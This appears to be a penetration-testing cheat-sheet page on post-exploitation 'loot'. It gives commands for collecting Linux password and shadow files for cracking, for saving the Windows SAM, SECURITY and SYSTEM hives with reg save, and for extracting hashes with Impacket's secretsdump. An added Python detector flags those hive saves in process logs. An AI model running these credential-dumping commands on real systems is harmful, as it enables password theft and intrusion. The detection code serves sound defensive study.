Loot
Once we are root or NT AUTHORITY\SYSTEM, it's time to collect some loot. 🤑🤑🤑
Linux
Dump users and passwords
Collect files on target
/etc/passwd
/etc/shadow
Then unshadow and crack them.
Windows
Dump SAM
Collect files on target
reg save hklm\sam .\sam
reg save hklm\security .\security
reg save hklm\system .\system
Then crack them using Impacket's secretsdump:
secretsdump.py -sam sam -security security -system system LOCAL
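Seen from the defending side, the three reg save commands above leave process-creation events with a recognisable command line. The following is an added example, not part of the original page: it scans such events for whole-hive saves of SAM, SECURITY and SYSTEM and groups them per host and user. The event field names, the sample events and the severity rule are assumptions made for illustration.

```python
import re
from collections import defaultdict

# "reg save" of a whole SAM, SECURITY or SYSTEM hive (not a subkey beneath it).
HIVE_SAVE = re.compile(
    r'\breg(?:\.exe)?"?\s+save\s+"?(?:hklm|hkey_local_machine)\\'
    r'(sam|security|system)\b(?!\\)',
    re.IGNORECASE,
)

def find_hive_saves(events):
    """Group hive-save commands by (host, user); return one finding per group."""
    seen = defaultdict(set)
    for ev in events:
        m = HIVE_SAVE.search(ev["command_line"])
        if m:
            seen[(ev["host"], ev["user"])].add(m.group(1).upper())
    findings = []
    for (host, user), hives in sorted(seen.items()):
        # SYSTEM holds the boot key needed to read SAM and SECURITY offline, so
        # SYSTEM plus either of the others is rated high (assumed severity rule).
        usable = "SYSTEM" in hives and bool(hives & {"SAM", "SECURITY"})
        findings.append({
            "host": host,
            "user": user,
            "hives": sorted(hives),
            "severity": "high" if usable else "medium",
        })
    return findings

# Constructed sample events (field names are assumptions, not a real log schema).
SAMPLE_EVENTS = [
    {"host": "WS01", "user": "CORP\\alice", "command_line": r"reg save hklm\sam .\sam"},
    {"host": "WS01", "user": "CORP\\alice", "command_line": r"reg save hklm\security .\security"},
    {"host": "WS01", "user": "CORP\\alice", "command_line": r"reg save hklm\system .\system"},
    {"host": "WS02", "user": "CORP\\bob", "command_line": r'"C:\Windows\System32\reg.exe" save HKLM\SYSTEM C:\bk\sys.hiv'},
    {"host": "WS03", "user": "CORP\\carol", "command_line": r"reg save HKLM\SYSTEM\CurrentControlSet\Services svc.hiv"},
    {"host": "WS03", "user": "CORP\\carol", "command_line": r"reg query hklm\sam"},
]

if __name__ == "__main__":
    for finding in find_hive_saves(SAMPLE_EVENTS):
        print(finding)
```

The subkey save and the reg query on WS03 are deliberately not flagged, which keeps routine registry backups of individual keys out of the results.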
Dump NTDS (DC)
By default, the Ntds.dit file is located at %SystemRoot%\NTDS\Ntds.dit on a domain controller.
TODO (see /13-misc/impacket.md)